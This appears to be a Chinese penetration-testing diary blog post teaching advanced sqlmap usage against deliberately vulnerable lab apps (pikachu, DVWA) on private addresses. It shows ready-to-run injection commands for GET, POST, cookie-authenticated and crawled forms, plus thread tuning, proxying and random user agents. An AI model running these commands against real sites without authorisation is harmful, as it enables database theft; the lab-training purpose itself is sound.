在职老D渗透日记day2:sql注入漏洞(sqlmap高级用法)

4.SQLMAP高级用法

4.1.修改默认线程

gedit /usr/share/sqlmap/lib/core/settings.py
设置它的线程
MAX_NUMBER_OF_THREADS = 1000
设置最大的线程数为1000

4.2.统计功能

sqlmap -u "http://192.168.1.178/pikachu/vul/sqli/sqli_str.php?name=grady&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --batch -T users -D pikachu --count
--count是统计
统计pikachu数据库的users表数据量

sqlmap -u "http://192.168.1.178/pikachu/vul/sqli/sqli_str.php?name=grady&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --batch -p name -T users -D pikachu --count
-p name针对参数name

4.3.检测post注入

sqlmap -u http://192.168.1.178/pikachu/vul/sqli/sqli_id.php --data "id=5&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --batch -p id

4.4.需要登录才能注入的

win10搭建dvwa靶场,步骤同pikachu,将/config/config.inc.php中user:password改为root:root,创建数据库,登录127.0.0.1/dvwa,登录账号和密码为admin:password,设置安全性为low

sqlmap -u "http://192.168.1.178/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --dbms mysql -v 1 --batch -p id --cookie "PHPSESSID=2gdniie8gc37r3t0mjl0u71o2m;security=low"

4.5.读取http包

burpsuite+firefox FoxyProxy抓取dvwa靶场SQL Injection的http包

vi sql.txt                                   创建sql.txt,填入抓到的http包
sqlmap -r sql.txt                            sqlmap读取http包
sqlmap -r sql.txt --batch --flush-session    sqlmap读取http包
--batch默认跑
--flush-session清缓存

4.6.使用代理注入

sqlmap -r sql.txt --batch --flush-session -p id --proxy=http://192.168.1.88:8181
sqlmap -r sql.txt --batch --flush-session -p id --proxy=http://192.168.1.88:8181 --random-agent
--random-agent 随机浏览器头请求

4.7.自动爬url检测注入

sqlmap -u http://192.168.1.178/pikachu/ --dbms mysql -v 1 --batch --crawl=3
--crawl=3 深度3
sqlmap -u http://192.168.1.178/pikachu/ --dbms mysql -v 1 --batch --crawl=3 --forms
自动爬取表单提交相关的 --forms表单
sqlmap -u http://192.168.1.178/pikachu/vul/sqli/sqli_str.php --dbms mysql -v 1 --batch --forms
检测指定登录框架或者表单的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值